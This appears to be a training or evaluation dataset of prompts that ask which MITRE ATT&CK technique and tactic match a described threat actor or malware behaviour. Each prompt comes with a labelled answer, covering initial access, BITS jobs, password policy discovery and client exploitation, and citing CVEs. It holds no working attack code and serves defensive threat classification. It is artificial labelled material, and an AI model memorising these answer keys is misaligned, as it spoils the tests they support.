+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KARAE was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.","Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POORAIM has been delivered through compromised sites acting as watering holes.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has infected victim machines through compromised websites and exploit kits.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 has been delivered to targets via downloads from malicious domains.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish has been distributed through compromised websites with malicious content often masquerading as browser updates.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors exploited VMWare Horizon Unified Access Gateways that were vulnerable to several Log4Shell vulnerabilities, including CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider exploited CVE-2021-35464 in the ForgeRock Open Access Management (OpenAM) application server to gain initial access.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors exploited CVE-2023-46805 and CVE-2024-21887 in Ivanti Connect Secure VPN appliances to enable authentication bypass and command injection. A server-side request forgery (SSRF) vulnerability, CVE-2024-21893, was identified later and used to bypass mitigations for the initial two vulnerabilities by chaining with CVE-2024-21887.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used SQL injection exploits against extranet web servers to gain access.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors exploited multiple vulnerabilities in externally facing servers.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors gained initial access by exploiting vulnerabilities in JBoss webservers.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used SQL injection for initial compromise.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central through unsafe deserialization, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices. APT41 leveraged vulnerabilities such as ProxyLogon exploitation or SQL injection for initial access.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has exploited vulnerabilities in externally facing software and devices including Pulse Secure VPNs and Citrix Application Delivery Controllers.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has been observed using SQL injection to gain access to systems.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor. BackdoorDiplomacy has also exploited mis-configured Plesk servers.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has exploited multiple unpatched vulnerabilities for initial access including vulnerabilities in Microsoft Exchange, Manage Engine AdSelfService Plus, Confluence, and Log4j.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has exploited known vulnerabilities such as CVE-2017-1000486 (Primefaces Application Expression Language Injection), CVE-2015-7450 (WebSphere Application Server SOAP Deserialization Exploit), CVE-2010-5326 (SAP NewWeaver Invoker Servlet Exploit), and EDB-ID-24963 (SAP NetWeaver ConfigServlet Remote Code Execution) to gain initial access.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has compromised targeted organizations through exploitation of CVE-2021-31207 in Exchange.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM exploited a publicly-facing servers including Wildfly/JBoss servers to gain access to the network.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GOLD SOUTHFIELD has exploited Oracle WebLogic vulnerabilities for initial compromise.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has exploited CVE-2021-44228 in Log4j and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to compromise on-premises versions of Microsoft Exchange Server.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has exploited the Log4j utility (CVE-2021-44228), on-premises MS Exchange servers via ""ProxyShell"" (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and Fortios SSL VPNs (CVE-2018-13379).","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has exploited known vulnerabilities in public-facing infrastructure such as Microsoft Exchange Servers.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team exploits public-facing applications for initial access and to acquire infrastructure, such as exploitation of the EXIM mail transfer agent in Linux systems.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has exploited the ProxyLogon vulnerability (CVE-2021-26855) to compromise Exchange Servers at multiple organizations.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volatile Cedar has targeted publicly facing web servers, with both automatic and manual vulnerability discovery.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon gained initial access through exploitation of CVE-2021-40539 in internet-facing ManageEngine ADSelfService Plus servers.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER is installed following exploitation of a vulnerable FortiGate device.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Havij is used to automate SQL injection.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape is executed after the attacker gains initial access to a Windows container using a known vulnerability.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has been dropped through exploitation of CVE-2011-2462, CVE-2013-3163, and CVE-2014-0322.","Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: sqlmap can be used to automate exploitation of SQL injection vulnerabilities.,"Tecnique: T1190 Exploit Public-Facing Application, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET adds malicious code to a host's Xcode projects by enumerating CocoaPods target_integrator.rb files under the /Library/Ruby/Gems folder or enumerates all .xcodeproj folders under a given directory. XCSSET then downloads a script and Mach-O file into the Xcode project folder.,"Tecnique: T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 gained initial network access to some victims via a trojanized update of SolarWinds Orion software.","Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.","Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has compromised legitimate web browser updates to deliver a backdoor.,"Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has placed trojanized installers for control system software on legitimate vendor app stores.,"Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has gained initial access by compromising a victim's software supply chain.,"Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.,"Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has distributed NotPetya by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.,"Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has compromised the Able Desktop installer to gain access to victim's environments.,"Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CCBkdr was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.","Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy has been packaged with a legitimate tax preparation software.,"Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT malware was designed and used to insert SUNBURST into software builds of the SolarWinds Orion IT management product.,"Tecnique: T1195.002 Supply Chain Compromise: Compromise Software Supply Chain, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used BITSAdmin to download and install payloads.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used BITSAdmin to download additional tools.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has used BITS jobs to download malicious payloads.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used batch scripts that utilizes WMIC to execute a BITSAdmin transfer of a ransomware payload to each compromised machine.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITSAdmin can be used to create BITS Jobs to launch a malicious process.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar has been downloaded via Windows BITS functionality.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can download a hosted ""beacon"" payload using BITSAdmin.","Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has used BITSadmin to download and execute malicious DLLs.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A JPIN variant downloads the backdoor payload via the BITS service.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can use BITS Utility to connect with the C2 server.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ProLock can use BITS jobs to download its malicious payload.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UBoatRAT takes advantage of the /SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence.,"Tecnique: T1197 BITS Jobs, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 gained access through compromised accounts at cloud solution partners, and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems.","Tecnique: T1199 Trusted Relationship, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network.","Tecnique: T1199 Trusted Relationship, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has compromised IT, cloud services, and managed services providers to gain broad access to multiple customers for subsequent operations.","Tecnique: T1199 Trusted Relationship, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GOLD SOUTHFIELD has breached Managed Service Providers (MSP's) to deliver malware to MSP customers.,"Tecnique: T1199 Trusted Relationship, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations.,"Tecnique: T1199 Trusted Relationship, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POLONIUM has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company.,"Tecnique: T1199 Trusted Relationship, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization.,"Tecnique: T1199 Trusted Relationship, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has compromised third party service providers to gain access to victim's environments.,"Tecnique: T1199 Trusted Relationship, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used legitimate access granted to Managed Service Providers in order to access victims of interest.,"Tecnique: T1199 Trusted Relationship, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya used Bash Bunny, Raspberry Pi, netbooks or inexpensive laptops to connect to the company’s local network.","Tecnique: T1200 Hardware Additions, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `net accounts` command as part of their advanced reconnaissance.","Tecnique: T1201 Password Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used the NtdsAudit utility to collect information related to accounts and passwords.,"Tecnique: T1201 Password Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used net.exe in a script with net accounts /domain to find the password policy of a domain.,"Tecnique: T1201 Password Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used net accounts and net accounts /domain to acquire password policy information.,"Tecnique: T1201 Password Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can collect password policy information on the target environment.,"Tecnique: T1201 Password Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can discover the password policies applied to the target system.,"Tecnique: T1201 Password Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects password policy information with the command net accounts.,"Tecnique: T1201 Password Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The net accounts and net accounts /domain commands with Net can be used to obtain password policy information.,"Tecnique: T1201 Password Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can use Get-PassPol to enumerate the domain password policy.,"Tecnique: T1201 Password Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group persistence mechanisms have used forfiles.exe to execute .htm files.,"Tecnique: T1202 Indirect Command Execution, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Forfiles can be used to subvert controls and possibly conceal command execution by not directly invoking cmd.,"Tecnique: T1202 Indirect Command Execution, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT uses the Forfiles utility to execute commands on the system.,"Tecnique: T1202 Indirect Command Execution, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611).","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used RTF document that includes an exploit to execute malicious code. (CVE-2017-11882),"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774).","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has used exploits for Flash Player (CVE-2016-4117, CVE-2018-4878), Word (CVE-2017-0199), Internet Explorer (CVE-2020-1380 and CVE-2020-26411), and Microsoft Edge (CVE-2021-26411) for execution.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has exploited numerous ActiveX vulnerabilities, including zero-days.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aoqin Dragon has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has exploited Adobe Flash vulnerability CVE-2015-8651 for execution.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has exploited Microsoft Office vulnerability CVE-2017-11882.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa has exploited CVE-2018-0798 for execution.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
